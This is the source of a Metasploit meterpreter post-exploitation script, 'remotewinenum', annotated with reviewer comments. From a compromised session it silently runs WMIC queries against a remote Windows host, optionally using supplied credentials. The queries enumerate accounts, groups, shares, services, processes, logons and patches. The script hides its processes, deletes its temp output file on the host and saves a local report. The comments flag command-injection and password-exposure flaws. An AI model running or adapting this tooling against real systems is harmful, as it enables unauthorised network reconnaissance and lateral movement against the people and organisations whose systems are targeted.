

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/scripts/meterpreter/remotewinenum.rb
##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
# The Meterpreter client is referred to as +session+ for the rest of the script.
session = client

# Option state; the MAIN section fills these in from -h/-t/-u/-p.
helpcall = 0   # becomes 1 once -h has been handled
rusr = nil     # -u: remote user; nil means "use the identity the session runs as"
rpass = nil    # -p: remote password (ends up on the wmic command line on the host)
trg = ""       # -t: address handed to wmic /node:

# Script Options
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu."],
  "-t" => [ true, "The target address"],
  "-u" => [ true, "User on the target system (If not provided it will use credential of process)"],
  "-p" => [ true, "Password of user on target system"]
)

# Suffix appended to the local report file name. The format is
# year-month-day then minute.second; there is no hour field, so two runs
# in different hours can produce the same suffix.
filenameinfo = "_#{::Time.now.strftime("%Y%m%d.%M%S")}"

# Local directory that receives the report; created if it does not exist.
logs = ::File.join(Msf::Config.log_directory, 'scripts', 'remotewinenum')
::FileUtils.mkdir_p(logs)

# WMIC queries run against the target host, in this order.
wmic = [
  'environment list',
  'share list',
  'nicconfig list',
  'computersystem list',
  'useraccount list',
  'group list',
  'sysaccount list',
  'volume list brief',
  'logicaldisk get description,filesystem,name,size',
  'netlogin get name,lastlogon,badpasswordcount',
  'netclient list brief',
  'netuse get name,username,connectiontype,localname',
  'share get name,path',
  'nteventlog get path,filename,writeable',
  'service list brief',
  'process list brief',
  'startup list full',
  'rdtoggle list',
  'product get name,version',
  'qfe list'
]
58
################## Function Declarations ##################
59
60
# Function for running a list of WMIC commands stored in a array, returns string
#
# Each entry of +wmic+ is run on the session's host as "cmd.exe /c wmic ...",
# with all output appended to one temporary file in the host's %TEMP%
# (wmictmp<N>.txt). That file is read back into a string and then deleted
# with "cmd.exe /c del".
#
# session - Meterpreter client the commands are executed through
# wmic    - Array of wmic argument strings (e.g. 'share list')
# user    - Remote user for /user:, or nil to run under the session's own identity
# pass    - Password for /password:; only used when +user+ is given
# trgt    - Value for /node:, the host wmic queries
#
# Returns the collected output as a String ('' if nothing could be read).
#
# NOTE(review): user, pass, trgt and every wmi entry are interpolated
# unquoted into a cmd.exe command line. They therefore appear verbatim in
# the host's process command line (process-creation auditing sees the
# password), and a value containing shell metacharacters changes what cmd.exe
# runs.
def wmicexec(session,wmic,user,pass,trgt)
  print_status("Running WMIC Commands ....")
  tmpout = ''
  command = nil
  runfail = 0   # assigned here but never read or updated below
  runningas = session.sys.config.getuid
  begin
    tmp = session.sys.config.getenv('TEMP')
    # Temporary file on windows host to store results
    wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"

    wmic.each do |wmi|
      if user == nil
        # Printed once per command, not once per run.
        print_status("The commands will be ran under the credentials of #{runningas}")
        command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
      else
        command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
      end
      print_status "\trunning command wimic #{wmi}"
      # Three echo helpers write a banner separating this command's output
      # in the file. Each one reassigns +r+ without closing the previous
      # process handle; only the last handle (the wmic run) is closed below.
      # 'Hidden' is the string 'true' here and the boolean true for wmic;
      # both are truthy.
      r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
      sleep(1)
      r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
      sleep(1)
      r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
      sleep(1)
      #print_status "\twmic #{command}"
      r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
      #Making sure that wmic finishes before executing next wmic command
      # Polls the host's process list until no process named wmic.exe exists
      # at all (any wmic.exe, not only the one started above), so an unrelated
      # wmic.exe keeps this loop spinning.
      prog2check = "wmic.exe"
      found = 0
      sleep(2)
      while found == 0
        session.sys.process.get_processes().each do |x|
          found =1
          if prog2check == (x['name'].downcase)
            sleep(0.5)
            found = 0
          end
        end
      end
      r.close
    end
    # Read the output file of the wmic commands
    wmioutfile = session.fs.file.new(wmicfl, "rb")
    until wmioutfile.eof?
      tmpout << wmioutfile.read
    end
    # Close output file in host
    wmioutfile.close
  rescue ::Exception => e
    # Rescues every exception class, including interrupts and exit requests;
    # the error is printed and whatever was collected so far is returned.
    # If the failure happened after the file was opened, it is not closed.
    print_status("Error running WMIC commands: #{e.class} #{e}")
  end
  # We delete the file with the wmic command output.
  # Runs on the error path too; if getenv raised, wmicfl is still nil here.
  c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
  c.close
  tmpout
end
118
119
#------------------------------------------------------------------------------
# Function to generate report header
#
# Builds the text placed at the top of the report: timestamp, the uid the
# Meterpreter session runs as, the local host name and OS, and the target.
#
# session - Meterpreter client whose sysinfo is read
# target  - Address given with -t, echoed into the "Target:" line
# dest    - Local report path; only printed here, nothing is written
#
# Returns the header String, terminated by three empty lines.
def headerbuid(session,target,dest)
  sysinfo = session.sys.config.sysinfo
  stamp = ::Time.now.strftime("%Y-%m-%d.%H:%M:%S")
  lines = [
    "Date: #{stamp}",
    # Reads the script-global +client+, not the +session+ argument.
    "Running as: #{client.sys.config.getuid}",
    "From: #{sysinfo['Computer']}",
    "OS: #{sysinfo['OS']}",
    "Target: #{target}"
  ]
  report_header = lines.join("\n") << "\n\n\n\n"

  print_status("Saving report to #{dest}")
  report_header
end
135
136
#------------------------------------------------------------------------------
# Function Help Message
#
# Prints the script banner followed by the option table of @@exec_opts.
# Output goes through Kernel#print, so no status prefix is added.
def helpmsg
  banner = [
    "Remote Windows Enumeration Meterpreter Script\n",
    "This script will enumerate windows hosts in the target environment\n",
    "given a username and password or using the credential under witch\n",
    "Meterpreter is running using WMI wmic windows native tool.\n",
    "Usage:\n"
  ].join
  print(banner + @@exec_opts.usage)
end
146
################## MAIN ##################
# Entry point. Only proceeds on a Windows session: parses the options, then
# writes the report header and the WMIC output to one local file under +logs+.
if client.platform == 'windows'
  localos = session.sys.config.sysinfo

  # Check that the command is not being ran on a Win2k host
  # since wmic is not present in Windows 2000
  # NOTE(review): sysinfo is indexed as a Hash elsewhere in this file
  # (sysinfo['OS'] in headerbuid), so matching the whole object against a
  # Regexp with =~ does not look at the OS string; this guard looks like it
  # never fires. Probably meant localos['OS'] — confirm.
  if localos =~ /(Windows 2000)/
    print_status("This script is not supported to be ran from Windows 2000 servers!!!")
  else
    # Parsing of Options
    @@exec_opts.parse(args) { |opt, idx, val|
      case opt

      when "-t"
        trg = val
      when "-u"
        rusr = val
      when "-p"
        rpass = val
      when "-h"
        helpmsg
        helpcall = 1
      end

    }
    #logfile name
    # The -t value is used unmodified as part of the local file name.
    dest = logs + "/" + trg + filenameinfo
    # Executing main logic of the script
    if helpcall == 0 and trg != ""

      # Making sure that is running as System a Username and Password for target machine must be provided

      if is_system? && rusr == nil && rpass == nil

        print_status("Stopped: Running as System and no user provided for connecting to target!!")

      # The expression after `else` is evaluated and its value discarded;
      # this branch behaves as a plain else.
      else trg != nil && helpcall != 1

        # Header first, then the WMIC output, both to the same dest.
        # Whether file_local_write appends or truncates is not visible here —
        # if it truncates, the header is overwritten; confirm.
        file_local_write(dest,headerbuid(session,trg,dest))
        file_local_write(dest,wmicexec(session,wmic,rusr,rpass,trg))

      end
    elsif helpcall == 0 and trg == ""

      # No -t and no -h: show usage instead of running.
      helpmsg
    end
  end
else
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end